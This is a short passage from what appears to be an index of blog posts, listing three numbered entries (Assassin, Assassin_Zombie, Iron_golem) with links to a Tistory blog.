18 | 15. Assassin : http://chaneyoon.tistory.com/65
19 | 16. Assassin_Zombie : http://chaneyoon.tistory.com/66
20 | 21. Iron_golem : http://chaneyoon.tistory.com/107
21 | 
22 | 
23 | 


--------------------------------------------------------------------------------